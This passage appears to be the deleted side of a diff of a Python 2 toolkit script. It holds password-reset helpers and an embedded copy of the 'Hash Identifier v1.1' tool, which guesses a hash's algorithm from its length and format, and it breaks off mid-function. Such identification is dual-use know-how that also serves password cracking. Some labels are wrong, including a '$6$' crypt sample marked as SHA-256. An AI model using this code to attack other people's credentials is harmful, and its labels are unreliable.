- if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - 